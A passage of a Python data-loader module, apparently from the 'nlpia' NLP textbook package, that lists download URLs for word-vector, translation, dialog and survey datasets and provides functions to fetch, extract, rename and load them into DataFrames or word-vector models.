os.path.join(BIGDATA_PATH, filepath) # word2vec_output_file = os.path.join(BIGDATA_PATH, filepath.split(os.path.sep)[-1][:-4] + '.w2v.txt') # if not os.path.isfile(word2vec_output_file): # TODO: also check file size # glove2word2vec(glove_input_file=filepath, word2vec_output_file=word2vec_output_file) # return KeyedVectors.load_word2vec_format(word2vec_output_file) def get_en2fr(url='http://www.manythings.org/anki/fra-eng.zip'): """ Download and parse English->French translation dataset used in Keras seq2seq example """ download_unzip(url) return pd.read_table(url, compression='zip', header=None, skip_blank_lines=True, sep='\t', skiprows=0, names='en fr'.split()) def load_anki_df(language='deu'): """ Load into a DataFrame statements in one language along with their translation into English >>> df = get_data('zsm') >>> list(list(df.columns)[:2]) ['eng', 'zsm'] >>> len(df) > 100 True >> get_data('zsm').head(2) eng zsm 0 Are you new? Awak baru? 1 Forget it. Lupakanlah. """ if os.path.isfile(language): filepath = language lang = re.search('[a-z]{3}-eng/', filepath).group()[:3].lower() else: lang = (language or 'deu').lower()[:3] filepath = os.path.join(BIGDATA_PATH, '{}-eng'.format(lang), '{}.txt'.format(lang)) df = pd.read_table(filepath, skiprows=1, header=None) for i, newc in enumerate(['eng', lang, 'license']): df.columns = [newc if str(c).lower().strip().startswith(newc) else c for c in df.columns] if newc not in df.columns and i < len(df.columns): columns = list(df.columns) columns[i] = newc df.columns = columns return df BIG_URLS = { 'w2v': ( 'https://www.dropbox.com/s/965dir4dje0hfi4/GoogleNews-vectors-negative300.bin.gz?dl=1', 1647046227, 'GoogleNews-vectors-negative300.bin.gz', KeyedVectors.load_word2vec_format, {'binary': True}, ), 'words_google_news': ( 'https://www.dropbox.com/s/9pm0js9qdjr04jy/words_google_news.txt.gz?dl=1', 3015517, ), 'glove_twitter': ( 'https://nlp.stanford.edu/data/glove.twitter.27B.zip', 1520408563, ), 'glove_small': ( 'https://nlp.stanford.edu/data/glove.6B.zip', 862182613, os.path.join('glove.6B', 'glove.6B.50d.txt'), load_glove, ), 'glove_large': ( 'https://nlp.stanford.edu/data/glove.840B.300d.zip', 2176768927, ), 'glove_medium': ( 'https://nlp.stanford.edu/data/glove.42B.300d.zip', 1877800501, ), 'slang': ( 'https://www.dropbox.com/s/43c22018fbfzypd/slang.csv.gz?dl=1', 117633024, ), 'tweets': ( 'https://www.dropbox.com/s/5gpb43c494mc8p0/tweets.csv.gz?dl=1', 311725313, ), 'crimedata': ( 'https://www.dropbox.com/s/mg4yokpifu3n6u5/crimedata.csv.gz?dl=1', 2126689, ), 'cities': ( 'https://www.dropbox.com/s/tcri5eyzpabhnyy/cities.csv.gz?dl=1', 8396891, ), 'cities_us_wordvectors': ( 'https://www.dropbox.com/s/7ujezmo03b637q3/cities_us_wordvectors.csv.gz?dl=1', 8451128, ), 'dialog': ( 'https://www.dropbox.com/s/5543bkihxflzry9/dialog.csv.gz?dl=1', 4415234, ), 'cornellmovies': ( 'http://www.cs.cornell.edu/~cristian/data/cornell_movie_dialogs_corpus.zip', 9916637, 'cornell_movie_dialogs_corpus', ), 'save_dialog_tweets': ( 'https://www.dropbox.com/s/tlrr9bm45uzm9yl/save_dialog_tweets.txt.gz?dl=1', 4517000, ), 'lsa_tweets': ( 'https://www.dropbox.com/s/rpjt0d060t4n1mr/lsa_tweets_5589798_2003588x200.tar.gz?dl=1', 3112841563, ), 'lsa_tweets_pickle': ( 'https://www.dropbox.com/s/7k0nvl2dx3hsbqp/lsa_tweets_5589798_2003588x200.pkl.projection.u.npy?dl=1', 2900000000, ), 'ubuntu_dialog_1500k': ( 'https://www.dropbox.com/s/krvi79fbsryytc2/ubuntu_dialog_1500k.csv.gz?dl=1', 296098788, ), 'ubuntu_dialog_test': ( 'https://www.dropbox.com/s/47mqbx0vgynvnnj/ubuntu_dialog_test.csv.gz?dl=1', 31273, ), 'imdb': ( 'https://www.dropbox.com/s/yviic64qv84x73j/aclImdb_v1.tar.gz?dl=1', 84125825, 'aclImdb', # directory for extractall load_imdb_df, # postprocessor to combine text files into a single DataFrame ), 'imdb_test': ( 'https://www.dropbox.com/s/cpgrf3udzkbmvuu/aclImdb_test.tar.gz?dl=1', 10858, 'aclImdb_test', # directory for extractall load_imdb_df, ), 'alice': ( # 'https://www.dropbox.com/s/py952zad3mntyvp/aiml-en-us-foundation-alice.v1-9.zip?dl=1', 'https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/' \ 'aiml-en-us-foundation-alice/aiml-en-us-foundation-alice.v1-9.zip', 8249482, ), # BRFSS annual mental health survey 'cdc': ( 'https://www.cdc.gov/brfss/annual_data/2016/files/LLCP2016ASC.zip', 52284490, ), } for yr in range(2011, 2017): BIG_URLS['cdc' + str(yr)[-2:]] = ('https://www.cdc.gov/brfss/annual_data/{yr}/files/LLCP{yr}ASC.zip'.format(yr=yr), None) # Aliases for bigurls. Canonical name given on line by itself. BIG_URLS['cornell'] = BIG_URLS['cornellmoviedialog'] = BIG_URLS['cornellmoviedialogs'] = BIG_URLS['cornell_movie_dialog'] = \ BIG_URLS['cornell_movie_dialogs'] = BIG_URLS['cornell_movie_dialog_corpus'] = BIG_URLS['cornell_movie_dialogs_corpus'] = \ BIG_URLS['cornellmovies'] BIG_URLS['word2vec'] = BIG_URLS['wv'] = \ BIG_URLS['w2v'] BIG_URLS['glove'] = BIG_URLS['glovesm'] = BIG_URLS['glove-sm'] = BIG_URLS['glove_sm'] = BIG_URLS['glove-small'] = \ BIG_URLS['glove_small'] BIG_URLS['ubuntu'] = BIG_URLS['ubuntu_dialog'] = \ BIG_URLS['ubuntu_dialog_1500k'] BIG_URLS['glovelg'] = BIG_URLS['glove_lg'] = BIG_URLS['glove-lg'] = BIG_URLS['glove-large'] = \ BIG_URLS['glove_large'] BIG_URLS['glovemed'] = BIG_URLS['glove_med'] = BIG_URLS['glove-med'] = BIG_URLS['glove-medium'] = \ BIG_URLS['glove_medium'] def generate_big_urls_glove(bigurls=None): """ Generate a dictionary of URLs for various combinations of GloVe training set sizes and dimensionality """ bigurls = bigurls or {} for num_dim in (50, 100, 200, 300): # not all of these dimensionality, and training set size combinations were trained by Stanford for suffixes, num_words in zip( ('sm -sm _sm -small _small'.split(), 'med -med _med -medium _medium'.split(), 'lg -lg _lg -large _large'.split()), (6, 42, 840) ): for suf in suffixes[:-1]: name = 'glove' + suf + str(num_dim) dirname = 'glove.{num_words}B'.format(num_words=num_words) # glove.42B.300d.w2v.txt filename = dirname + '.{num_dim}d.w2v.txt'.format(num_dim=num_dim) # seed the alias named URL with the URL for that training set size's canonical name bigurl_tuple = BIG_URLS['glove' + suffixes[-1]] bigurls[name] = list(bigurl_tuple[:2]) bigurls[name].append(os.path.join(dirname, filename)) bigurls[name].append(load_glove) bigurls[name] = tuple(bigurls[name]) return bigurls BIG_URLS.update(generate_big_urls_glove()) ANKI_LANGUAGES = 'afr arq ara aze eus bel ben ber bul yue cat cbk cmn chv hrv ces dan nld est fin fra glg kat ' \ 'deu ell heb hin hun isl ind ita jpn kha khm kor lvs lit nds mkd zsm mal mri mar max nob pes ' \ 'pol por ron rus srp slk slv spa swe tgl tam tat tha tur ukr urd uig vie'.split() ANKI_LANGUAGE_SYNONYMS = list(zip('fre esp ger french spanish german turkish turkey dut dutch'.split(), 'fra spa deu fra spa deu tur tur dan dan'.split())) LANG2ANKI = dict((lang[:2], lang) for lang in ANKI_LANGUAGES) """ >>> len(ANKI_LANGUAGES) - len(LANG2ANKI) 9 """ ENGLISHES = 'eng usa us bri british american aus australian'.split() for lang in ANKI_LANGUAGES: for eng in ENGLISHES: BIG_URLS[lang] = ('http://www.manythings.org/anki/{}-eng.zip'.format(lang), 1000, '{}-{}'.format(lang, eng), load_anki_df) BIG_URLS[lang + '-eng'] = ('http://www.manythings.org/anki/{}-eng.zip'.format(lang), 1000, '{}-{}'.format(lang, eng), load_anki_df) for syn, lang in ANKI_LANGUAGE_SYNONYMS: BIG_URLS[syn] = BIG_URLS[lang] for eng in ENGLISHES: BIG_URLS[lang + '-' + eng] = BIG_URLS[lang + '-eng'] """ Google N-Gram Viewer meta data is from: * [GOOGLE_NGRAM files](https://storage.googleapis.com/books/ngrams/books/datasetsv2.html) * [GOOGLE_NGRAM data format](https://books.google.com/ngrams/info) """ GOOGLE_NGRAM_URL = 'http://storage.googleapis.com/books/ngrams/books/' GOOGLE_NGRAM_NAMES = '0 1 2 3 4 5 6 7 8 9 a b c d e f g h i j k l m n o other p pos punctuation q r s t u v w x y z'.split() GOOGLE_NGRAM_FILE = 'googlebooks-eng-all-1gram-20120701-{}.gz' for name in GOOGLE_NGRAM_NAMES: BIG_URLS['1gram_{}'.format(name)] = (GOOGLE_NGRAM_URL + GOOGLE_NGRAM_FILE.format(name), 1000, GOOGLE_NGRAM_FILE.format(name), pd.read_table, {'sep': '\t', 'header': None, 'names': 'term_pos year term_freq book_freq'.split()}) try: BIGDATA_INFO = pd.read_csv(BIGDATA_INFO_FILE, header=0) log.warning('Found BIGDATA index in {default} so it will overwrite nlpia.loaders.BIG_URLS !!!'.format( default=BIGDATA_INFO_FILE)) except (IOError, pd.errors.EmptyDataError): BIGDATA_INFO = pd.DataFrame(columns='name url file_size'.split()) log.info('No BIGDATA index found in {default} so copy {latest} to {default} if you want to "freeze" it.'.format( default=BIGDATA_INFO_FILE, latest=BIGDATA_INFO_LATEST)) BIG_URLS.update(dict(zip(BIGDATA_INFO.name, zip(BIGDATA_INFO.url, BIGDATA_INFO.file_size)))) BIGDATA_INFO = pd.DataFrame(list( zip(BIG_URLS.keys(), list(zip(*BIG_URLS.values()))[0], list(zip(*BIG_URLS.values()))[1])), columns='name url file_size'.split()) BIGDATA_INFO.to_csv(BIGDATA_INFO_LATEST) # FIXME: consolidate with DATA_INFO or BIG_URLS DATA_NAMES = { 'pointcloud': os.path.join(DATA_PATH, 'pointcloud.csv.gz'), 'hutto_tweets0': os.path.join(DATA_PATH, 'hutto_ICWSM_2014/tweets_GroundTruth.csv.gz'), 'hutto_tweets': os.path.join(DATA_PATH, 'hutto_ICWSM_2014/tweets_GroundTruth.csv'), 'hutto_nyt': os.path.join(DATA_PATH, 'hutto_ICWSM_2014/nytEditorialSnippets_GroundTruth.csv.gz'), 'hutto_movies': os.path.join(DATA_PATH, 'hutto_ICWSM_2014/movieReviewSnippets_GroundTruth.csv.gz'), 'hutto_products': os.path.join(DATA_PATH, 'hutto_ICWSM_2014/amazonReviewSnippets_GroundTruth.csv.gz'), } # FIXME: put these in BIG_URLS, and test/use them with get_data() DDL_DS_QUESTIONS_URL = 'http://minimum-entropy.districtdatalabs.com/api/questions/?format=json' DDL_DS_ANSWERS_URL = 'http://minimum-entropy.districtdatalabs.com/api/answers/?format=json' # Files to load into local variables like loaders.kite_text loaders.kite_history TEXTS = ['kite_text.txt', 'kite_history.txt'] CSVS = ['mavis-batey-greetings.csv', 'sms-spam.csv'] DATA_INFO = pd.read_csv(DATA_INFO_FILE, header=0) def rename_file(source, dest): """ Rename (mv) file(s) from source to dest >>> from tempfile import mkdtemp >>> tmpdir = mkdtemp(suffix='doctest_rename_file', prefix='tmp') >>> fout = ensure_open(os.path.join(tmpdir, 'fake_data.bin.gz'), 'w') >>> fout.write(b'fake nlpia.loaders.rename_file') 30 >>> fout.close() >>> dest = rename_file(os.path.join(tmpdir, 'fake_data.bin.gz'), os.path.join(tmpdir, 'Fake_Data.bin.gz')) >>> os.path.isfile(os.path.join(tmpdir, 'Fake_Data.bin.gz')) True """ log.debug('nlpia.loaders.rename_file(source={}, dest={})'.format(source, dest)) if not isinstance(source, str): dest = [dest] if isinstance(dest, str) else dest return [rename_file(s, d) for (s, d) in zip_longest(source, dest, fillvalue=[source, dest][int(len(source) > len(dest))])] log.debug('nlpia.loaders.os.rename(source={}, dest={})'.format(source, dest)) if source == dest: return dest os.rename(source, dest) return dest def normalize_ext_rename(filepath): """ normalize file ext like '.tgz' -> '.tar.gz' and '300d.txt' -> '300d.glove.txt' and rename the file >>> pth = os.path.join(DATA_PATH, 'sms_slang_dict.txt') >>> pth == normalize_ext_rename(pth) True """ # log.warning('normalize_ext.filepath=' + str(filepath)) new_file_path = normalize_ext(filepath) # log.warning('download_unzip.new_filepath=' + str(new_file_path)) # FIXME: fails when name is a url filename filepath = rename_file(filepath, new_file_path) log.warning('download_unzip.filepath=' + str(filepath)) return filepath def untar(fname, verbose=True): """ Uunzip and untar a tar.gz file into a subdir of the BIGDATA_PATH directory """ if fname.lower().endswith(".tar.gz"): dirpath = os.path.join(BIGDATA_PATH, os.path.basename(fname)[:-7]) if os.path.isdir(dirpath): return dirpath with tarfile.open(fname) as tf: members = tf.getmembers() for member in tqdm(members, total=len(members)): tf.extract(member, path=BIGDATA_PATH) dirpath = os.path.join(BIGDATA_PATH, members[0].name) if os.path.isdir(dirpath): return dirpath else: log.warning("Not a tar.gz file: {}".format(fname)) def series_rstrip(series, endswith='/usercomments', ignorecase=True): """ Strip a suffix str (`endswith` str) from a `df` columns or pd.Series of type str """ return series_strip(series, startswith=None, endswith=endswith, startsorendswith=None, ignorecase=ignorecase) def series_lstrip(series, startswith='http://', ignorecase=True): """ Strip a suffix str (`endswith` str) from a `df` columns or pd.Series of type str """ return series_strip(series, startswith=startswith, endswith=None, startsorendswith=None, ignorecase=ignorecase) def series_strip(series, startswith=None, endswith=None, startsorendswith=None, ignorecase=True): """ Strip a suffix/prefix str (`endswith`/`startswith` str) from a `df` columns or pd.Series of type str """ if ignorecase: mask = series.str.lower() endswith = endswith.lower() else: mask = series if not (startsorendswith or endswith or startswith): log.warning('In series_strip(): You must specify endswith, startswith, or startsorendswith string arguments.') return series if startsorendswith: startswith = endswith = startsorendswith if endswith: mask = mask.str.endswith(endswith) series[mask] = series[mask].str[:-len(endswith)] if startswith: mask = mask.str.endswith(startswith) series[mask] = series[mask].str[len(startswith):] return series def endswith_strip(s, endswith='.txt', ignorecase=True): """ Strip a suffix from the end of a string >>> endswith_strip('http://TotalGood.com', '.COM') 'http://TotalGood' >>> endswith_strip('http://TotalGood.com', endswith='.COM', ignorecase=False) 'http://TotalGood.com' """ if ignorecase: if s.lower().endswith(endswith.lower()): return s[:-len(endswith)] else: if s.endswith(endswith): return s[:-len(endswith)] return s def startswith_strip(s, startswith='http://', ignorecase=True): """ Strip a prefix from the beginning of a string >>> startswith_strip('HTtp://TotalGood.com', 'HTTP://') 'TotalGood.com' >>> startswith_strip('HTtp://TotalGood.com', startswith='HTTP://', ignorecase=False) 'HTtp://TotalGood.com' """ if ignorecase: if s.lower().startswith(startswith.lower()): return s[len(startswith):] else: if s.endswith(startswith): return s[len(startswith):] return s def combine_dfs(dfs, index_col='index0 index1 index2'.split()): if isinstance(dfs, 'dict'): dfs = list(dfs.values()) def get_longest_table(url='https://www.openoffice.org/dev_docs/source/file_extensions.html', header=0): """ Retrieve the HTML tables from a URL and return the longest DataFrame found >>> get_longest_table('https://en.wikipedia.org/wiki/List_of_sovereign_states').columns Index(['Common and formal names', 'Membership within the UN System[a]', 'Sovereignty dispute[b]', 'Further information on status and recognition of sovereignty[d]'], dtype='object') """ dfs = pd.read_html(url, header=header) return longest_table(dfs) def get_leet_map(): r""" Retrieve mapping from English letters to l33t like E => 3 or A => /\ or /-\ or @ """ df = get_longest_table( 'https://sites.google.com/site/inhainternetlanguage/different-internet-languages/l33t/list-of-l33ts', header=None) df = df.drop(index=0).iloc[:, :2] df.columns = ['eng', 'l33t'] df['l33t'] = df['l33t'].str.split(',') table = [] for i, row in df.iterrows(): for s in row['l33t']: table.append((row['eng'].strip(), s.strip())) table = pd.DataFrame(table, columns=df.columns) leet_path = os.path.join(DATA_PATH, 'l33t.csv') log.info('Saving l33t dictionary (character mapping) to {}'.format(leet_path)) table.to_csv(leet_path) return table def get_netspeak_map(): """ Retrieve mapping from chat/text abbreviations and acronyms like LMK => Let Me Know """ dfs = pd.read_html('https://www.webopedia.com/quick_ref/textmessageabbreviations.asp') df = dfs[0].drop(index=0) df.columns = ['abbrev', 'definition'] csv_path = os.path.join(DATA_PATH, 'netspeak.csv') log.info('Saving netspeak dictionary (word mapping) to {}'.format(csv_path)) df.to_csv(csv_path) return df # more nontabular lists at 'https://simple.wikipedia.org/wiki/Leet def longest_table(dfs): """ Return this single longest DataFrame that among an array/list/tuple of DataFrames Useful for automagically finding the DataFrame you want when using pd.read_html() on a Wikipedia page. """ sorted_indices = sorted((len(df if hasattr(df, '__len__') else []), i) for i, df in enumerate(dfs)) return dfs[sorted_indices[-1][1]] def get_filename_extensions(url='https://tan.sfo2.digitaloceanspaces.com/midata/public/corpora/nlpia/file_extensions.html'): """ Load a DataFrame of filename extensions from the indicated url > df = get_filename_extensions('https://www.webopedia.com/quick_ref/fileextensionsfull.asp') > df = get_filename_extensions('https://www.openoffice.org/dev_docs/source/file_extensions.html') >>> df = get_filename_extensions('https://tan.sfo2.digitaloceanspaces.com/midata/public/corpora/nlpia/file_extensions.html') >>> df.head(2) ext description 0 .a UNIX static library file. 1 .asm Non-UNIX assembler source file. """ df = get_longest_table(url) columns = list(df.columns) columns[0] = 'ext' columns[1] = 'description' if len(columns) > 2: columns[2] = 'details' df.columns = columns return df ####################################################################### # Populate some local string variables with text files from DATA_PATH for filename in TEXTS: with ensure_open(os.path.join(DATA_PATH, filename)) as fin: locals()[filename.split('.')[0]] = fin.read() del fin for filename in CSVS: locals()['df_' + filename.split('.')[0].replace('-', '_')] = read_csv( os.path.join(DATA_PATH, filename)) def migrate_big_urls(big_urls=BIG_URLS, inplace=True): r""" Migrate the big_urls table schema/structure from a dict of lists to a dict of dicts >>> big_urls = {'x': (1, 2, 3, "4x"), 'y': ("yme", "cause")} >>> inplace = migrate_big_urls(big_urls=big_urls) >>> inplace {'x': {0: 1, 1: 2, 2: 3, 3: '4x'}, 'y': {0: 'yme', 1: 'cause'}} >>> inplace is big_urls True >>> big_urls = {'x': [1, 2, 3, "4x"], 'y': ["yme", "cause"]} >>> copied = migrate_big_urls(big_urls=big_urls, inplace=False) >>> copied {'x': {0: 1, 1: 2, 2: 3, 3: '4x'}, 'y': {0: 'yme', 1: 'cause'}} >>> copied is big_urls False >>> copied['x'] is big_urls['x'] False >>> 1 is copied['x'][0] is big_urls['x'][0] True """ if not inplace: big_urls = deepcopy(big_urls) for name, meta in big_urls.items(): big_urls[name] = dict(zip(range(len(meta)), meta)) big_urls[name] = dict(zip(range(len(meta)), meta)) # big_urls[name]['filenames'] = [normalize_ext(big_urls)] return big_urls BIG_URLS = migrate_big_urls(BIG_URLS) def normalize_glove(filepath): r""" https://stackoverflow.com/questions/37793118/load-pretrained-glove-vectors-in-python#45894001 """ # FIXME filepath = expand_filepath(filepath) raise NotImplementedError() def unzip(filepath, verbose=True): r""" Unzip GloVE models and convert to word2vec binary models (gensim.KeyedVectors) The only kinds of files that are returned are "*.asc" and "*.txt" and only after renaming. """ filepath = expand_filepath(filepath) filename = os.path.basename(filepath) tqdm_prog = tqdm if verbose else no_tqdm z = ZipFile(filepath) unzip_dir = filename.split('.')[0] if filename.split('.')[0] else os.path.splitext(filename)[0] unzip_dir = os.path.join(BIGDATA_PATH, unzip_dir) if not os.path.isdir(unzip_dir) or not len(os.listdir(unzip_dir)) == len(z.filelist): z.extractall(path=unzip_dir) log.info('unzip_dir contains: {}'.format(os.listdir(unzip_dir))) # for f in os.listdir(unzip_dir): # if f.lower().endswith('about.txt'): # os.remove(os.path.join(unzip_dir, f)) for f in tqdm_prog(os.listdir(unzip_dir)): if f[-1] in ' \t\r\n\f': bad_path = os.path.join(unzip_dir, f) log.warning('Stripping whitespace from end of filename: {} -> {}'.format( repr(bad_path), repr(bad_path.rstrip()))) shutil.move(bad_path, bad_path.rstrip()) # rename_file(source=bad_path, dest=bad_path.rstrip()) anki_paths = [os.path.join(unzip_dir, f) for f in os.listdir(unzip_dir) if f.lower()[:3] in ANKI_LANGUAGES and f.lower()[3:] == '.txt'] log.info('anki_paths: {}'.format(anki_paths)) w2v_paths = [os.path.join(BIGDATA_PATH, f[:-4] + '.w2v.txt') for f in os.listdir(unzip_dir) if f.lower().endswith('.txt') and 'glove' in f.lower()] for f, word2vec_output_file in zip(os.listdir(unzip_dir), w2v_paths): glove_input_file = os.path.join(unzip_dir, f) log.info('Attempting to converting GloVE format to Word2vec: {} -> {}'.format( repr(glove_input_file), repr(word2vec_output_file))) try: glove2word2vec(glove_input_file=glove_input_file, word2vec_output_file=word2vec_output_file) except: # noqa log.info('Failed to convert GloVE format to Word2vec: {} -> {}'.format( repr(glove_input_file), repr(word2vec_output_file))) txt_paths = [os.path.join(BIGDATA_PATH, f.lower()[:-4] + '.txt') for f in os.listdir(unzip_dir) if f.lower().endswith('.asc')] for f, txt_file in zip(os.listdir(unzip_dir), txt_paths): if f.lower().endswith('.asc'): input_file = os.path.join(unzip_dir, f) log.info('Renaming .asc file to .txt: {} -> {}'.format( repr(input_file), repr(txt_file))) shutil.move(input_file, txt_file) return anki_paths + txt_paths + w2v_paths def create_big_url(name): """ If name looks like a url, with an http, add an entry for it in BIG_URLS """ # BIG side effect global BIG_URLS filemeta = get_url_filemeta(name) if not filemeta: return None filename = filemeta['filename'] remote_size = filemeta['remote_size'] url = filemeta['url'] name = filename.split('.') name = (name[0] if name[0] not in ('', '.') else name[1]).replace(' ', '-') name = name.lower().strip() BIG_URLS[name] = (url, int(remote_size or -1), filename) return name def get_ftp_filemeta(parsed_url, username='anonymous', password='<EMAIL>'): """ FIXME: Get file size, hostname, path metadata from FTP server using parsed_url (urlparse)""" return dict( url=parsed_url.geturl(), hostname=parsed_url.hostname, path=parsed_url.path, username=(parsed_url.username or username), remote_size=-1, filename=os.path.basename(parsed_url.path)) ftp = ftplib.FTP(parsed_url.hostname) ftp.login(username, password) ftp.cwd(parsed_url.path) ftp.retrbinary("RETR " + filename, open(filename, 'wb').write) ftp.quit() def download_unzip(names=None, normalize_filenames=False, verbose=True): r""" Download CSV or HTML tables listed in `names`, unzip and to DATA_PATH/`names`.csv .txt etc TODO: move to web or data_utils or futils Also normalizes file name extensions (.bin.gz -> .w2v.bin.gz). Uses table in data_info.csv (internal DATA_INFO) to determine URL or file path from dataset name. Also looks If names or [names] is a valid URL then download it and create a name from the url in BIG_URLS (not yet pushed to data_info.csv) """ names = [names] if isinstance(names, (str, basestring)) else names # names = names or list(BIG_URLS.keys()) # download them all, if none specified! file_paths = {} for name in names: created = create_big_url(name) name = (created or name).lower().strip() if name in BIG_URLS: filepath = download_name(name, verbose=verbose) if not filepath: continue file_paths[name] = normalize_ext_rename(filepath) log.debug('downloaded name={} to filepath={}'.format(name, file_paths[name])) fplower = file_paths[name].lower() if fplower.endswith('.tar.gz'): log.info('Extracting {}'.format(file_paths[name])) file_paths[name] = untar(file_paths[name], verbose=verbose) log.debug('download_untar.filepaths=' + str(file_paths)) elif file_paths[name].lower().endswith('.zip'): file_paths[name] = unzip(file_paths[name], verbose=verbose) log.debug('download_unzip.filepaths=' + str(file_paths)) else: df = pd.read_html(DATA_INFO['url'][name], **DATA_INFO['downloader_kwargs'][name])[-1] df.columns = clean_columns(df.columns) file_paths[name] = os.path.join(DATA_PATH, name + '.csv') df.to_csv(file_paths[name]) file_paths[name] = normalize_ext_rename(file_paths[name]) return file_paths download = download_unzip def download_file(url, data_path=BIGDATA_PATH, filename=None, size=None, chunk_size=4096, normalize_filename=False, verbose=True): """Uses stream=True and a reasonable chunk size to be able to download large (GB) files over https Downloading this small file takes 1.5 sec. All subsequent "downloads" takes .6 sec to verify path and size. >>> import time >>> meta = BIG_URLS['ubuntu_dialog_test'] >>> pathend = os.path.join(*('nlpia/src/nlpia/bigdata/ubuntu_dialog_test.csv.gz'.split('/'))) >>> download_file(url=meta[0], verbose=False).endswith(pathend) True >>> t0 = time.time() >>> localpath = download_file(url=BIG_URLS['ubuntu_dialog_test'][0], verbose=False) >>> t1 = time.time() >>> localpath is None or ((0.015 < (t1 - t0) < 5.0) and localpath.endswith(pathend)) True >>> t0 = time.time() >>> download_file(url=meta[0], size=meta[1], verbose=False).endswith(pathend) True >>> time.time() - t0 < 0.02 True """ if isinstance(url, (list, tuple)): return [ download_file( s, data_path=data_path, filename=filename, size=size, chunk_size=chunk_size, verbose=verbose) for s in url] if url.endswith('dl=0'): url = url[:-1] + '1' # noninteractive Dropbox download remote_size = size # figure out what filename to expect after download and how big it should be if filename is None: filename = dropbox_basename(url) filepath = os.path.join(data_path, filename) if normalize_filename: filepath = normalize_filepath(filepath) log.info('expanded+normalized file path: {}'.format(filepath)) tqdm_prog = tqdm if verbose else no_tqdm log.info('requesting URL: {}'.format(url)) log.info('remote_size: {}'.format(remote_size)) stat = path_status(filepath) local_size = stat.get('size', None) log.info('local_size: {}'.format(local_size)) r = None if not remote_size or not stat['type'] == 'file' or not local_size >= remote_size or not stat['size'] > MIN_DATA_FILE_SIZE: try: r = requests_get(url, stream=True, allow_redirects=True, timeout=5) remote_size = r.headers.get('Content-Length', -1) except ConnectionError: log.error('ConnectionError for url: {} => request {}'.format(url, r)) remote_size = -1 if remote_size is None else remote_size except (InvalidURL, InvalidSchema, InvalidHeader, MissingSchema) as e: log.warning(e) log.warning('HTTP Error for url: {}\n request: {}\n traceback: {}'.format(url, r, format_exc())) log.warning('This can happen for Google Word Vector download links to Dropbox or Google Docs.') try: remote_size = int(remote_size) except ValueError: remote_size = -1 # remote_size has changed so need to check it again # TODO: check md5 or get the right size of remote file if stat['type'] == 'file' and local_size >= remote_size and stat['size'] > MIN_DATA_FILE_SIZE: r = r.close() if r else r log.info('retained: {}'.format(filepath)) return filepath filedir = os.path.dirname(filepath) created_dir = mkdir_p(filedir) log.info('data path created: {}'.format(created_dir)) assert os.path.isdir(filedir) assert created_dir.endswith(filedir) bytes_downloaded = 0 if r: log.info('downloading to: {}'.format(filepath)) with open(filepath, 'wb') as f: for chunk in tqdm_prog(r.iter_content(chunk_size=chunk_size), total=ceil(remote_size / float(chunk_size))): bytes_downloaded += len(chunk) if chunk: # filter out keep-alive chunks f.write(chunk) r.close() else: log.error(f'Unable to requests.get(url={url}) using request object {r}') return None log.debug('nlpia.loaders.download_file: bytes={}'.format(bytes_downloaded)) stat = path_status(filepath) log.info("local file stat {}".format(stat)) log.debug("filepath={}: local_size={}, remote_size={}, downloaded_bytes={}".format( filepath, size, remote_size, bytes_downloaded)) return filepath def download_name(name, verbose=True, **kwargs): meta = BIG_URLS[name] size = meta[1] or -1 url = meta[0] return download_file(url=url, size=size, verbose=verbose, normalize_filename=True, **kwargs) # for filename in meta['filenames'] def read_named_csv(name, data_path=DATA_PATH, nrows=None, verbose=True): """ Convert a dataset in a local file (usually a CSV) into a Pandas DataFrame TODO: should be called read_named_dataset Args: `name` is assumed not to have an extension (like ".csv"), alternative extensions are tried automatically.file """ print(f"Loading file with name: {name}") if os.path.isfile(name): try: return read_json(name) except (IOError, UnicodeDecodeError, json.JSONDecodeError): pass try: return read_csv(name, nrows=nrows) except (IOError, pd.errors.ParserError): pass try: return read_text(name, nrows=nrows) except (IOError, UnicodeDecodeError): pass data_path = expand_filepath(data_path) if os.path.isfile(os.path.join(data_path, name)): return read_csv(os.path.join(data_path, name), nrows=nrows) if name in DATASET_NAME2FILENAME: filename = DATASET_NAME2FILENAME[name] if filename.lower().endswith('.txt') or filename.lower().endswith('.txt.gz'): return read_text(os.path.join(data_path, filename), nrows=nrows) elif filename.lower().endswith('.bin.gz'): ipdb.set_trace() return KeyedVectors.load_word2vec_format(os.path.join(BIGDATA_PATH, name + '.bin.gz'), binary=True) try: return read_csv(os.path.join(data_path, name + '.csv.gz'), nrows=nrows) except IOError: pass try: return read_csv(os.path.join(data_path, name + '.csv'), nrows=nrows) except IOError: pass try: return read_json(os.path.join(data_path, name + '.json')) except IOError: pass try: return read_text(os.path.join(data_path, name + '.txt'), verbose=verbose) except IOError: pass # FIXME: mapping from short name to uncompressed filename # BIGDATA files are usually not loadable into dataframes filepath = os.path.join(BIGDATA_PATH, name + '.bin.gz') if os.path.isfile(filepath): try: ipdb.set_trace() return KeyedVectors.load_word2vec_format(filepath, binary=True) except ValueError: pass filepath = os.path.join(BIGDATA_PATH, name + '.txt') if os.path.isfile(filepath): return read_text(filepath, verbose=verbose) def get_data(name='sms-spam', nrows=None, limit=None): r""" Load data from a json, csv, or txt file if it exists in the data dir. References: [cities_air_pollution_index](https://www.numbeo.com/pollution/rankings.jsp) [cities](http://download.geonames.org/export/dump/cities.zip) [cities_us](http://download.geonames.org/export/dump/cities_us.zip) >>> from nlpia.data.loaders import get_data >>> words = get_data('words_ubuntu_us') >>> len(words) 99171 >>> list(words[:8]) ['A', "A's", "AA's", "AB's", "ABM's", "AC's", "ACTH's", "AI's"] >>> get_data('ubuntu_dialog_test').iloc[0] Context i think we could import the old comments via r... Utterance basically each xfree86 upload will NOT force u... Name: 0, dtype: object >>> df = get_data('imdb_test') >>> df.shape (20, 3) >>> df.columns Index(['url', 'rating', 'text'], dtype='object') >>> df.describe() rating count 20.000000 mean 5.450000 std 3.300319 min 1.000000 25% 3.000000 50% 5.500000 75% 8.250000 max 10.000000 """ nrows = nrows or limit if name in BIG_URLS: log.info('Downloading {}'.format(name)) filepaths = download_unzip(name, normalize_filenames=True) log.debug('nlpia.loaders.get_data.filepaths=' + str(filepaths)) filepath = filepaths[name][0] if isinstance(filepaths[name], (list, tuple)) else filepaths[name] log.debug('nlpia.loaders.get_data.filepath=' + str(filepath)) filepathlow = filepath.lower() if len(BIG_URLS[name]) >= 4: kwargs = BIG_URLS[name][4] if len(BIG_URLS[name]) >= 5 else {} return BIG_URLS[name][3](filepath, **kwargs) if filepathlow.endswith('.w2v.txt'): try: return KeyedVectors.load_word2vec_format(filepath, binary=False, limit=nrows) except (TypeError, UnicodeError): pass if filepathlow.endswith('.w2v.bin') or 